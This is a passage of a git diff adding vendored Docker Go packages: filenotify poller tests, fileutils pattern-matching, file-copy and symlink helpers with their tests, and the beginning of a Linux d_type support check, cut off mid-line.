b/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go @@ -0,0 +1,119 @@ +package filenotify + +import ( + "fmt" + "io/ioutil" + "os" + "runtime" + "testing" + "time" + + "github.com/fsnotify/fsnotify" +) + +func TestPollerAddRemove(t *testing.T) { + w := NewPollingWatcher() + + if err := w.Add("no-such-file"); err == nil { + t.Fatal("should have gotten error when adding a non-existent file") + } + if err := w.Remove("no-such-file"); err == nil { + t.Fatal("should have gotten error when removing non-existent watch") + } + + f, err := ioutil.TempFile("", "asdf") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(f.Name()) + + if err := w.Add(f.Name()); err != nil { + t.Fatal(err) + } + + if err := w.Remove(f.Name()); err != nil { + t.Fatal(err) + } +} + +func TestPollerEvent(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("No chmod on Windows") + } + w := NewPollingWatcher() + + f, err := ioutil.TempFile("", "test-poller") + if err != nil { + t.Fatal("error creating temp file") + } + defer os.RemoveAll(f.Name()) + f.Close() + + if err := w.Add(f.Name()); err != nil { + t.Fatal(err) + } + + select { + case <-w.Events(): + t.Fatal("got event before anything happened") + case <-w.Errors(): + t.Fatal("got error before anything happened") + default: + } + + if err := ioutil.WriteFile(f.Name(), []byte("hello"), 644); err != nil { + t.Fatal(err) + } + if err := assertEvent(w, fsnotify.Write); err != nil { + t.Fatal(err) + } + + if err := os.Chmod(f.Name(), 600); err != nil { + t.Fatal(err) + } + if err := assertEvent(w, fsnotify.Chmod); err != nil { + t.Fatal(err) + } + + if err := os.Remove(f.Name()); err != nil { + t.Fatal(err) + } + if err := assertEvent(w, fsnotify.Remove); err != nil { + t.Fatal(err) + } +} + +func TestPollerClose(t *testing.T) { + w := NewPollingWatcher() + if err := w.Close(); err != nil { + t.Fatal(err) + } + // test double-close + if err := w.Close(); err != nil { + t.Fatal(err) + } + + f, err := ioutil.TempFile("", "asdf") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(f.Name()) + if err := w.Add(f.Name()); err == nil { + t.Fatal("should have gotten error adding watch for closed watcher") + } +} + +func assertEvent(w FileWatcher, eType fsnotify.Op) error { + var err error + select { + case e := <-w.Events(): + if e.Op != eType { + err = fmt.Errorf("got wrong event type, expected %q: %v", eType, e) + } + case e := <-w.Errors(): + err = fmt.Errorf("got unexpected error waiting for events %v: %v", eType, e) + case <-time.After(watchWaitTime * 3): + err = fmt.Errorf("timeout waiting for event %v", eType) + } + return err +} diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go new file mode 100644 index 0000000000..c63ae75ce8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go @@ -0,0 +1,283 @@ +package fileutils + +import ( + "errors" + "fmt" + "io" + "os" + "path/filepath" + "regexp" + "strings" + "text/scanner" + + "github.com/Sirupsen/logrus" +) + +// exclusion returns true if the specified pattern is an exclusion +func exclusion(pattern string) bool { + return pattern[0] == '!' +} + +// empty returns true if the specified pattern is empty +func empty(pattern string) bool { + return pattern == "" +} + +// CleanPatterns takes a slice of patterns returns a new +// slice of patterns cleaned with filepath.Clean, stripped +// of any empty patterns and lets the caller know whether the +// slice contains any exception patterns (prefixed with !). +func CleanPatterns(patterns []string) ([]string, [][]string, bool, error) { + // Loop over exclusion patterns and: + // 1. Clean them up. + // 2. Indicate whether we are dealing with any exception rules. + // 3. Error if we see a single exclusion marker on its own (!). + cleanedPatterns := []string{} + patternDirs := [][]string{} + exceptions := false + for _, pattern := range patterns { + // Eliminate leading and trailing whitespace. + pattern = strings.TrimSpace(pattern) + if empty(pattern) { + continue + } + if exclusion(pattern) { + if len(pattern) == 1 { + return nil, nil, false, errors.New("Illegal exclusion pattern: !") + } + exceptions = true + } + pattern = filepath.Clean(pattern) + cleanedPatterns = append(cleanedPatterns, pattern) + if exclusion(pattern) { + pattern = pattern[1:] + } + patternDirs = append(patternDirs, strings.Split(pattern, string(os.PathSeparator))) + } + + return cleanedPatterns, patternDirs, exceptions, nil +} + +// Matches returns true if file matches any of the patterns +// and isn't excluded by any of the subsequent patterns. +func Matches(file string, patterns []string) (bool, error) { + file = filepath.Clean(file) + + if file == "." { + // Don't let them exclude everything, kind of silly. + return false, nil + } + + patterns, patDirs, _, err := CleanPatterns(patterns) + if err != nil { + return false, err + } + + return OptimizedMatches(file, patterns, patDirs) +} + +// OptimizedMatches is basically the same as fileutils.Matches() but optimized for archive.go. +// It will assume that the inputs have been preprocessed and therefore the function +// doesn't need to do as much error checking and clean-up. This was done to avoid +// repeating these steps on each file being checked during the archive process. +// The more generic fileutils.Matches() can't make these assumptions. +func OptimizedMatches(file string, patterns []string, patDirs [][]string) (bool, error) { + matched := false + file = filepath.FromSlash(file) + parentPath := filepath.Dir(file) + parentPathDirs := strings.Split(parentPath, string(os.PathSeparator)) + + for i, pattern := range patterns { + negative := false + + if exclusion(pattern) { + negative = true + pattern = pattern[1:] + } + + match, err := regexpMatch(pattern, file) + if err != nil { + return false, fmt.Errorf("Error in pattern (%s): %s", pattern, err) + } + + if !match && parentPath != "." { + // Check to see if the pattern matches one of our parent dirs. + if len(patDirs[i]) <= len(parentPathDirs) { + match, _ = regexpMatch(strings.Join(patDirs[i], string(os.PathSeparator)), + strings.Join(parentPathDirs[:len(patDirs[i])], string(os.PathSeparator))) + } + } + + if match { + matched = !negative + } + } + + if matched { + logrus.Debugf("Skipping excluded path: %s", file) + } + + return matched, nil +} + +// regexpMatch tries to match the logic of filepath.Match but +// does so using regexp logic. We do this so that we can expand the +// wildcard set to include other things, like "**" to mean any number +// of directories. This means that we should be backwards compatible +// with filepath.Match(). We'll end up supporting more stuff, due to +// the fact that we're using regexp, but that's ok - it does no harm. +// +// As per the comment in golangs filepath.Match, on Windows, escaping +// is disabled. Instead, '\\' is treated as path separator. +func regexpMatch(pattern, path string) (bool, error) { + regStr := "^" + + // Do some syntax checking on the pattern. + // filepath's Match() has some really weird rules that are inconsistent + // so instead of trying to dup their logic, just call Match() for its + // error state and if there is an error in the pattern return it. + // If this becomes an issue we can remove this since its really only + // needed in the error (syntax) case - which isn't really critical. + if _, err := filepath.Match(pattern, path); err != nil { + return false, err + } + + // Go through the pattern and convert it to a regexp. + // We use a scanner so we can support utf-8 chars. + var scan scanner.Scanner + scan.Init(strings.NewReader(pattern)) + + sl := string(os.PathSeparator) + escSL := sl + if sl == `\` { + escSL += `\` + } + + for scan.Peek() != scanner.EOF { + ch := scan.Next() + + if ch == '*' { + if scan.Peek() == '*' { + // is some flavor of "**" + scan.Next() + + if scan.Peek() == scanner.EOF { + // is "**EOF" - to align with .gitignore just accept all + regStr += ".*" + } else { + // is "**" + regStr += "((.*" + escSL + ")|([^" + escSL + "]*))" + } + + // Treat **/ as ** so eat the "/" + if string(scan.Peek()) == sl { + scan.Next() + } + } else { + // is "*" so map it to anything but "/" + regStr += "[^" + escSL + "]*" + } + } else if ch == '?' { + // "?" is any char except "/" + regStr += "[^" + escSL + "]" + } else if ch == '.' || ch == '$' { + // Escape some regexp special chars that have no meaning + // in golang's filepath.Match + regStr += `\` + string(ch) + } else if ch == '\\' { + // escape next char. Note that a trailing \ in the pattern + // will be left alone (but need to escape it) + if sl == `\` { + // On windows map "\" to "\\", meaning an escaped backslash, + // and then just continue because filepath.Match on + // Windows doesn't allow escaping at all + regStr += escSL + continue + } + if scan.Peek() != scanner.EOF { + regStr += `\` + string(scan.Next()) + } else { + regStr += `\` + } + } else { + regStr += string(ch) + } + } + + regStr += "$" + + res, err := regexp.MatchString(regStr, path) + + // Map regexp's error to filepath's so no one knows we're not using filepath + if err != nil { + err = filepath.ErrBadPattern + } + + return res, err +} + +// CopyFile copies from src to dst until either EOF is reached +// on src or an error occurs. It verifies src exists and removes +// the dst if it exists. +func CopyFile(src, dst string) (int64, error) { + cleanSrc := filepath.Clean(src) + cleanDst := filepath.Clean(dst) + if cleanSrc == cleanDst { + return 0, nil + } + sf, err := os.Open(cleanSrc) + if err != nil { + return 0, err + } + defer sf.Close() + if err := os.Remove(cleanDst); err != nil && !os.IsNotExist(err) { + return 0, err + } + df, err := os.Create(cleanDst) + if err != nil { + return 0, err + } + defer df.Close() + return io.Copy(df, sf) +} + +// ReadSymlinkedDirectory returns the target directory of a symlink. +// The target of the symbolic link may not be a file. +func ReadSymlinkedDirectory(path string) (string, error) { + var realPath string + var err error + if realPath, err = filepath.Abs(path); err != nil { + return "", fmt.Errorf("unable to get absolute path for %s: %s", path, err) + } + if realPath, err = filepath.EvalSymlinks(realPath); err != nil { + return "", fmt.Errorf("failed to canonicalise path for %s: %s", path, err) + } + realPathInfo, err := os.Stat(realPath) + if err != nil { + return "", fmt.Errorf("failed to stat target '%s' of '%s': %s", realPath, path, err) + } + if !realPathInfo.Mode().IsDir() { + return "", fmt.Errorf("canonical path points to a file '%s'", realPath) + } + return realPath, nil +} + +// CreateIfNotExists creates a file or a directory only if it does not already exist. +func CreateIfNotExists(path string, isDir bool) error { + if _, err := os.Stat(path); err != nil { + if os.IsNotExist(err) { + if isDir { + return os.MkdirAll(path, 0755) + } + if err := os.MkdirAll(filepath.Dir(path), 0755); err != nil { + return err + } + f, err := os.OpenFile(path, os.O_CREATE, 0755) + if err != nil { + return err + } + f.Close() + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go new file mode 100644 index 0000000000..ccd648fac3 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go @@ -0,0 +1,27 @@ +package fileutils + +import ( + "os" + "os/exec" + "strconv" + "strings" +) + +// GetTotalUsedFds returns the number of used File Descriptors by +// executing `lsof -p PID` +func GetTotalUsedFds() int { + pid := os.Getpid() + + cmd := exec.Command("lsof", "-p", strconv.Itoa(pid)) + + output, err := cmd.CombinedOutput() + if err != nil { + return -1 + } + + outputStr := strings.TrimSpace(string(output)) + + fds := strings.Split(outputStr, "\n") + + return len(fds) - 1 +} diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go new file mode 100644 index 0000000000..0f2cb7ab93 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go @@ -0,0 +1,7 @@ +package fileutils + +// GetTotalUsedFds Returns the number of used File Descriptors. +// On Solaris these limits are per process and not systemwide +func GetTotalUsedFds() int { + return -1 +} diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go new file mode 100644 index 0000000000..6df1be89bb --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go @@ -0,0 +1,585 @@ +package fileutils + +import ( + "io/ioutil" + "os" + "path" + "path/filepath" + "runtime" + "strings" + "testing" +) + +// CopyFile with invalid src +func TestCopyFileWithInvalidSrc(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-fileutils-test") + defer os.RemoveAll(tempFolder) + if err != nil { + t.Fatal(err) + } + bytes, err := CopyFile("/invalid/file/path", path.Join(tempFolder, "dest")) + if err == nil { + t.Fatal("Should have fail to copy an invalid src file") + } + if bytes != 0 { + t.Fatal("Should have written 0 bytes") + } + +} + +// CopyFile with invalid dest +func TestCopyFileWithInvalidDest(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-fileutils-test") + defer os.RemoveAll(tempFolder) + if err != nil { + t.Fatal(err) + } + src := path.Join(tempFolder, "file") + err = ioutil.WriteFile(src, []byte("content"), 0740) + if err != nil { + t.Fatal(err) + } + bytes, err := CopyFile(src, path.Join(tempFolder, "/invalid/dest/path")) + if err == nil { + t.Fatal("Should have fail to copy an invalid src file") + } + if bytes != 0 { + t.Fatal("Should have written 0 bytes") + } + +} + +// CopyFile with same src and dest +func TestCopyFileWithSameSrcAndDest(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-fileutils-test") + defer os.RemoveAll(tempFolder) + if err != nil { + t.Fatal(err) + } + file := path.Join(tempFolder, "file") + err = ioutil.WriteFile(file, []byte("content"), 0740) + if err != nil { + t.Fatal(err) + } + bytes, err := CopyFile(file, file) + if err != nil { + t.Fatal(err) + } + if bytes != 0 { + t.Fatal("Should have written 0 bytes as it is the same file.") + } +} + +// CopyFile with same src and dest but path is different and not clean +func TestCopyFileWithSameSrcAndDestWithPathNameDifferent(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-fileutils-test") + defer os.RemoveAll(tempFolder) + if err != nil { + t.Fatal(err) + } + testFolder := path.Join(tempFolder, "test") + err = os.MkdirAll(testFolder, 0740) + if err != nil { + t.Fatal(err) + } + file := path.Join(testFolder, "file") + sameFile := testFolder + "/../test/file" + err = ioutil.WriteFile(file, []byte("content"), 0740) + if err != nil { + t.Fatal(err) + } + bytes, err := CopyFile(file, sameFile) + if err != nil { + t.Fatal(err) + } + if bytes != 0 { + t.Fatal("Should have written 0 bytes as it is the same file.") + } +} + +func TestCopyFile(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-fileutils-test") + defer os.RemoveAll(tempFolder) + if err != nil { + t.Fatal(err) + } + src := path.Join(tempFolder, "src") + dest := path.Join(tempFolder, "dest") + ioutil.WriteFile(src, []byte("content"), 0777) + ioutil.WriteFile(dest, []byte("destContent"), 0777) + bytes, err := CopyFile(src, dest) + if err != nil { + t.Fatal(err) + } + if bytes != 7 { + t.Fatalf("Should have written %d bytes but wrote %d", 7, bytes) + } + actual, err := ioutil.ReadFile(dest) + if err != nil { + t.Fatal(err) + } + if string(actual) != "content" { + t.Fatalf("Dest content was '%s', expected '%s'", string(actual), "content") + } +} + +// Reading a symlink to a directory must return the directory +func TestReadSymlinkedDirectoryExistingDirectory(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + var err error + if err = os.Mkdir("/tmp/testReadSymlinkToExistingDirectory", 0777); err != nil { + t.Errorf("failed to create directory: %s", err) + } + + if err = os.Symlink("/tmp/testReadSymlinkToExistingDirectory", "/tmp/dirLinkTest"); err != nil { + t.Errorf("failed to create symlink: %s", err) + } + + var path string + if path, err = ReadSymlinkedDirectory("/tmp/dirLinkTest"); err != nil { + t.Fatalf("failed to read symlink to directory: %s", err) + } + + if path != "/tmp/testReadSymlinkToExistingDirectory" { + t.Fatalf("symlink returned unexpected directory: %s", path) + } + + if err = os.Remove("/tmp/testReadSymlinkToExistingDirectory"); err != nil { + t.Errorf("failed to remove temporary directory: %s", err) + } + + if err = os.Remove("/tmp/dirLinkTest"); err != nil { + t.Errorf("failed to remove symlink: %s", err) + } +} + +// Reading a non-existing symlink must fail +func TestReadSymlinkedDirectoryNonExistingSymlink(t *testing.T) { + var path string + var err error + if path, err = ReadSymlinkedDirectory("/tmp/test/foo/Non/ExistingPath"); err == nil { + t.Fatalf("error expected for non-existing symlink") + } + + if path != "" { + t.Fatalf("expected empty path, but '%s' was returned", path) + } +} + +// Reading a symlink to a file must fail +func TestReadSymlinkedDirectoryToFile(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + var err error + var file *os.File + + if file, err = os.Create("/tmp/testReadSymlinkToFile"); err != nil { + t.Fatalf("failed to create file: %s", err) + } + + file.Close() + + if err = os.Symlink("/tmp/testReadSymlinkToFile", "/tmp/fileLinkTest"); err != nil { + t.Errorf("failed to create symlink: %s", err) + } + + var path string + if path, err = ReadSymlinkedDirectory("/tmp/fileLinkTest"); err == nil { + t.Fatalf("ReadSymlinkedDirectory on a symlink to a file should've failed") + } + + if path != "" { + t.Fatalf("path should've been empty: %s", path) + } + + if err = os.Remove("/tmp/testReadSymlinkToFile"); err != nil { + t.Errorf("failed to remove file: %s", err) + } + + if err = os.Remove("/tmp/fileLinkTest"); err != nil { + t.Errorf("failed to remove symlink: %s", err) + } +} + +func TestWildcardMatches(t *testing.T) { + match, _ := Matches("fileutils.go", []string{"*"}) + if match != true { + t.Errorf("failed to get a wildcard match, got %v", match) + } +} + +// A simple pattern match should return true. +func TestPatternMatches(t *testing.T) { + match, _ := Matches("fileutils.go", []string{"*.go"}) + if match != true { + t.Errorf("failed to get a match, got %v", match) + } +} + +// An exclusion followed by an inclusion should return true. +func TestExclusionPatternMatchesPatternBefore(t *testing.T) { + match, _ := Matches("fileutils.go", []string{"!fileutils.go", "*.go"}) + if match != true { + t.Errorf("failed to get true match on exclusion pattern, got %v", match) + } +} + +// A folder pattern followed by an exception should return false. +func TestPatternMatchesFolderExclusions(t *testing.T) { + match, _ := Matches("docs/README.md", []string{"docs", "!docs/README.md"}) + if match != false { + t.Errorf("failed to get a false match on exclusion pattern, got %v", match) + } +} + +// A folder pattern followed by an exception should return false. +func TestPatternMatchesFolderWithSlashExclusions(t *testing.T) { + match, _ := Matches("docs/README.md", []string{"docs/", "!docs/README.md"}) + if match != false { + t.Errorf("failed to get a false match on exclusion pattern, got %v", match) + } +} + +// A folder pattern followed by an exception should return false. +func TestPatternMatchesFolderWildcardExclusions(t *testing.T) { + match, _ := Matches("docs/README.md", []string{"docs/*", "!docs/README.md"}) + if match != false { + t.Errorf("failed to get a false match on exclusion pattern, got %v", match) + } +} + +// A pattern followed by an exclusion should return false. +func TestExclusionPatternMatchesPatternAfter(t *testing.T) { + match, _ := Matches("fileutils.go", []string{"*.go", "!fileutils.go"}) + if match != false { + t.Errorf("failed to get false match on exclusion pattern, got %v", match) + } +} + +// A filename evaluating to . should return false. +func TestExclusionPatternMatchesWholeDirectory(t *testing.T) { + match, _ := Matches(".", []string{"*.go"}) + if match != false { + t.Errorf("failed to get false match on ., got %v", match) + } +} + +// A single ! pattern should return an error. +func TestSingleExclamationError(t *testing.T) { + _, err := Matches("fileutils.go", []string{"!"}) + if err == nil { + t.Errorf("failed to get an error for a single exclamation point, got %v", err) + } +} + +// A string preceded with a ! should return true from Exclusion. +func TestExclusion(t *testing.T) { + exclusion := exclusion("!") + if !exclusion { + t.Errorf("failed to get true for a single !, got %v", exclusion) + } +} + +// Matches with no patterns +func TestMatchesWithNoPatterns(t *testing.T) { + matches, err := Matches("/any/path/there", []string{}) + if err != nil { + t.Fatal(err) + } + if matches { + t.Fatalf("Should not have match anything") + } +} + +// Matches with malformed patterns +func TestMatchesWithMalformedPatterns(t *testing.T) { + matches, err := Matches("/any/path/there", []string{"["}) + if err == nil { + t.Fatal("Should have failed because of a malformed syntax in the pattern") + } + if matches { + t.Fatalf("Should not have match anything") + } +} + +// Test lots of variants of patterns & strings +func TestMatches(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + tests := []struct { + pattern string + text string + pass bool + }{ + {"**", "file", true}, + {"**", "file/", true}, + {"**/", "file", true}, // weird one + {"**/", "file/", true}, + {"**", "/", true}, + {"**/", "/", true}, + {"**", "dir/file", true}, + {"**/", "dir/file", false}, + {"**", "dir/file/", true}, + {"**/", "dir/file/", true}, + {"**/**", "dir/file", true}, + {"**/**", "dir/file/", true}, + {"dir/**", "dir/file", true}, + {"dir/**", "dir/file/", true}, + {"dir/**", "dir/dir2/file", true}, + {"dir/**", "dir/dir2/file/", true}, + {"**/dir2/*", "dir/dir2/file", true}, + {"**/dir2/*", "dir/dir2/file/", false}, + {"**/dir2/**", "dir/dir2/dir3/file", true}, + {"**/dir2/**", "dir/dir2/dir3/file/", true}, + {"**file", "file", true}, + {"**file", "dir/file", true}, + {"**/file", "dir/file", true}, + {"**file", "dir/dir/file", true}, + {"**/file", "dir/dir/file", true}, + {"**/file*", "dir/dir/file", true}, + {"**/file*", "dir/dir/file.txt", true}, + {"**/file*txt", "dir/dir/file.txt", true}, + {"**/file*.txt", "dir/dir/file.txt", true}, + {"**/file*.txt*", "dir/dir/file.txt", true}, + {"**/**/*.txt", "dir/dir/file.txt", true}, + {"**/**/*.txt2", "dir/dir/file.txt", false}, + {"**/*.txt", "file.txt", true}, + {"**/**/*.txt", "file.txt", true}, + {"a**/*.txt", "a/file.txt", true}, + {"a**/*.txt", "a/dir/file.txt", true}, + {"a**/*.txt", "a/dir/dir/file.txt", true}, + {"a/*.txt", "a/dir/file.txt", false}, + {"a/*.txt", "a/file.txt", true}, + {"a/*.txt**", "a/file.txt", true}, + {"a[b-d]e", "ae", false}, + {"a[b-d]e", "ace", true}, + {"a[b-d]e", "aae", false}, + {"a[^b-d]e", "aze", true}, + {".*", ".foo", true}, + {".*", "foo", false}, + {"abc.def", "abcdef", false}, + {"abc.def", "abc.def", true}, + {"abc.def", "abcZdef", false}, + {"abc?def", "abcZdef", true}, + {"abc?def", "abcdef", false}, + {"a\\*b", "a*b", true}, + {"a\\", "a", false}, + {"a\\", "a\\", false}, + {"a\\\\", "a\\", true}, + {"**/foo/bar", "foo/bar", true}, + {"**/foo/bar", "dir/foo/bar", true}, + {"**/foo/bar", "dir/dir2/foo/bar", true}, + {"abc/**", "abc", false}, + {"abc/**", "abc/def", true}, + {"abc/**", "abc/def/ghi", true}, + } + + for _, test := range tests { + res, _ := regexpMatch(test.pattern, test.text) + if res != test.pass { + t.Fatalf("Failed: %v - res:%v", test, res) + } + } +} + +// An empty string should return true from Empty. +func TestEmpty(t *testing.T) { + empty := empty("") + if !empty { + t.Errorf("failed to get true for an empty string, got %v", empty) + } +} + +func TestCleanPatterns(t *testing.T) { + cleaned, _, _, _ := CleanPatterns([]string{"docs", "config"}) + if len(cleaned) != 2 { + t.Errorf("expected 2 element slice, got %v", len(cleaned)) + } +} + +func TestCleanPatternsStripEmptyPatterns(t *testing.T) { + cleaned, _, _, _ := CleanPatterns([]string{"docs", "config", ""}) + if len(cleaned) != 2 { + t.Errorf("expected 2 element slice, got %v", len(cleaned)) + } +} + +func TestCleanPatternsExceptionFlag(t *testing.T) { + _, _, exceptions, _ := CleanPatterns([]string{"docs", "!docs/README.md"}) + if !exceptions { + t.Errorf("expected exceptions to be true, got %v", exceptions) + } +} + +func TestCleanPatternsLeadingSpaceTrimmed(t *testing.T) { + _, _, exceptions, _ := CleanPatterns([]string{"docs", " !docs/README.md"}) + if !exceptions { + t.Errorf("expected exceptions to be true, got %v", exceptions) + } +} + +func TestCleanPatternsTrailingSpaceTrimmed(t *testing.T) { + _, _, exceptions, _ := CleanPatterns([]string{"docs", "!docs/README.md "}) + if !exceptions { + t.Errorf("expected exceptions to be true, got %v", exceptions) + } +} + +func TestCleanPatternsErrorSingleException(t *testing.T) { + _, _, _, err := CleanPatterns([]string{"!"}) + if err == nil { + t.Errorf("expected error on single exclamation point, got %v", err) + } +} + +func TestCleanPatternsFolderSplit(t *testing.T) { + _, dirs, _, _ := CleanPatterns([]string{"docs/config/CONFIG.md"}) + if dirs[0][0] != "docs" { + t.Errorf("expected first element in dirs slice to be docs, got %v", dirs[0][1]) + } + if dirs[0][1] != "config" { + t.Errorf("expected first element in dirs slice to be config, got %v", dirs[0][1]) + } +} + +func TestCreateIfNotExistsDir(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-fileutils-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tempFolder) + + folderToCreate := filepath.Join(tempFolder, "tocreate") + + if err := CreateIfNotExists(folderToCreate, true); err != nil { + t.Fatal(err) + } + fileinfo, err := os.Stat(folderToCreate) + if err != nil { + t.Fatalf("Should have create a folder, got %v", err) + } + + if !fileinfo.IsDir() { + t.Fatalf("Should have been a dir, seems it's not") + } +} + +func TestCreateIfNotExistsFile(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-fileutils-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tempFolder) + + fileToCreate := filepath.Join(tempFolder, "file/to/create") + + if err := CreateIfNotExists(fileToCreate, false); err != nil { + t.Fatal(err) + } + fileinfo, err := os.Stat(fileToCreate) + if err != nil { + t.Fatalf("Should have create a file, got %v", err) + } + + if fileinfo.IsDir() { + t.Fatalf("Should have been a file, seems it's not") + } +} + +// These matchTests are stolen from go's filepath Match tests. +type matchTest struct { + pattern, s string + match bool + err error +} + +var matchTests = []matchTest{ + {"abc", "abc", true, nil}, + {"*", "abc", true, nil}, + {"*c", "abc", true, nil}, + {"a*", "a", true, nil}, + {"a*", "abc", true, nil}, + {"a*", "ab/c", false, nil}, + {"a*/b", "abc/b", true, nil}, + {"a*/b", "a/c/b", false, nil}, + {"a*b*c*d*e*/f", "axbxcxdxe/f", true, nil}, + {"a*b*c*d*e*/f", "axbxcxdxexxx/f", true, nil}, + {"a*b*c*d*e*/f", "axbxcxdxe/xxx/f", false, nil}, + {"a*b*c*d*e*/f", "axbxcxdxexxx/fff", false, nil}, + {"a*b?c*x", "abxbbxdbxebxczzx", true, nil}, + {"a*b?c*x", "abxbbxdbxebxczzy", false, nil}, + {"ab[c]", "abc", true, nil}, + {"ab[b-d]", "abc", true, nil}, + {"ab[e-g]", "abc", false, nil}, + {"ab[^c]", "abc", false, nil}, + {"ab[^b-d]", "abc", false, nil}, + {"ab[^e-g]", "abc", true, nil}, + {"a\\*b", "a*b", true, nil}, + {"a\\*b", "ab", false, nil}, + {"a?b", "a☺b", true, nil}, + {"a[^a]b", "a☺b", true, nil}, + {"a???b", "a☺b", false, nil}, + {"a[^a][^a][^a]b", "a☺b", false, nil}, + {"[a-ζ]*", "α", true, nil}, + {"*[a-ζ]", "A", false, nil}, + {"a?b", "a/b", false, nil}, + {"a*b", "a/b", false, nil}, + {"[\\]a]", "]", true, nil}, + {"[\\-]", "-", true, nil}, + {"[x\\-]", "x", true, nil}, + {"[x\\-]", "-", true, nil}, + {"[x\\-]", "z", false, nil}, + {"[\\-x]", "x", true, nil}, + {"[\\-x]", "-", true, nil}, + {"[\\-x]", "a", false, nil}, + {"[]a]", "]", false, filepath.ErrBadPattern}, + {"[-]", "-", false, filepath.ErrBadPattern}, + {"[x-]", "x", false, filepath.ErrBadPattern}, + {"[x-]", "-", false, filepath.ErrBadPattern}, + {"[x-]", "z", false, filepath.ErrBadPattern}, + {"[-x]", "x", false, filepath.ErrBadPattern}, + {"[-x]", "-", false, filepath.ErrBadPattern}, + {"[-x]", "a", false, filepath.ErrBadPattern}, + {"\\", "a", false, filepath.ErrBadPattern}, + {"[a-b-c]", "a", false, filepath.ErrBadPattern}, + {"[", "a", false, filepath.ErrBadPattern}, + {"[^", "a", false, filepath.ErrBadPattern}, + {"[^bc", "a", false, filepath.ErrBadPattern}, + {"a[", "a", false, filepath.ErrBadPattern}, // was nil but IMO its wrong + {"a[", "ab", false, filepath.ErrBadPattern}, + {"*x", "xxx", true, nil}, +} + +func errp(e error) string { + if e == nil { + return "" + } + return e.Error() +} + +// TestMatch test's our version of filepath.Match, called regexpMatch. +func TestMatch(t *testing.T) { + for _, tt := range matchTests { + pattern := tt.pattern + s := tt.s + if runtime.GOOS == "windows" { + if strings.Index(pattern, "\\") >= 0 { + // no escape allowed on windows. + continue + } + pattern = filepath.Clean(pattern) + s = filepath.Clean(s) + } + ok, err := regexpMatch(pattern, s) + if ok != tt.match || err != tt.err { + t.Fatalf("Match(%#q, %#q) = %v, %q want %v, %q", pattern, s, ok, errp(err), tt.match, errp(tt.err)) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go new file mode 100644 index 0000000000..d5c3abf568 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go @@ -0,0 +1,22 @@ +// +build linux freebsd + +package fileutils + +import ( + "fmt" + "io/ioutil" + "os" + + "github.com/Sirupsen/logrus" +) + +// GetTotalUsedFds Returns the number of used File Descriptors by +// reading it via /proc filesystem. +func GetTotalUsedFds() int { + if fds, err := ioutil.ReadDir(fmt.Sprintf("/proc/%d/fd", os.Getpid())); err != nil { + logrus.Errorf("Error opening /proc/%d/fd: %s", os.Getpid(), err) + } else { + return len(fds) + } + return -1 +} diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go new file mode 100644 index 0000000000..5ec21cace5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go @@ -0,0 +1,7 @@ +package fileutils + +// GetTotalUsedFds Returns the number of used File Descriptors. Not supported +// on Windows. +func GetTotalUsedFds() int { + return -1 +} diff --git a/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go new file mode 100644 index 0000000000..9fd054e77f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go @@ -0,0 +1,89 @@ +// +build linux + +package fsutils + +import ( + "fmt" + "io/ioutil" + "os" + "syscall" + "unsafe" +) + +func locateDummyIfEmpty(path string) (string, error) { + children, err := ioutil.ReadDir(path) + if err != nil { + return "", err + } + if len(children) != 0 { + return "", nil + } + dummyFile, err := ioutil.TempFile(path, "fsutils-dummy") + if err != nil { + return "", err + } + name := dummyFile.Name() + if err = dummyFile.Close(); err != nil { + return name, err + } + return name, nil +} + +// SupportsDType returns whether the filesystem mounted on path supports d_type +func SupportsDType(path string) (bool, error) { + // locate dummy so that we have at least one dirent + dummy, err := locateDummyIfEmpty(path) + if err != nil { + return false, err + } + if dummy != "" { + defer os.Remove(dummy) + } + + visited := 0 + supportsDType := true + fn := func(ent *syscall.Dirent) bool { + visited++ + if ent.Type == syscall.DT_UNKNOWN { + supportsDType = false + // stop iteration + return true + } + // continue iteration + return false + } + if err = iterateReadDir(path, fn); err != nil { + return false, err + } + if visited == 0 { + return false, fmt.Errorf("did not hit any dirent during 